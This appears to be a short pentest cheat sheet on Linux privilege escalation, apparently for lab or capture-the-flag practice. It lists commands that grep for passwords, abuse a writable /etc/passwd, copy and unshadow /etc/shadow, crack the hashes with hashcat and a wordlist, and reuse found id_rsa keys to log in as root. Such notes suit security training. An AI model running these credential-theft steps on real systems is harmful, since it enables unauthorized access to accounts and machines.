Password and file permission
Stored Passwords
history
orcat .bash_history
will show previous command and will sometines leak passwordfind . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
Sometimes a simple
ls
orls -la
will give interesting files
Weak File permission
Do we have access to file that we shouldn't?
ls -la /etc/passwd
This used to store password
If we can modify the file we can remove the x, we could change the num of the group of our user to become part of root group
ls -la /etc/shadow
We can copy the content of
/etc/passwd
in a file in our attacking machinewe can then use
unshadow
unshadow passwd shadow
We can then copy this output in another file and just keep the users with the hash
We can now look for the hash on hashcat.net our hashes start with
$6$
so we can ctrl+F this and this will give us the mode number to use.hashcat -m 1800 unshadowed /usr/share/wordlists/rockyou.txt -O
SSH keys
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
If we find an id_rsa key, we can copy it in our machine and use it to log in
Before using it we have to change the right
chmod 600 id_rsa
And then we can just
ssh -i id_rsa root@10.10.240.48
Last updated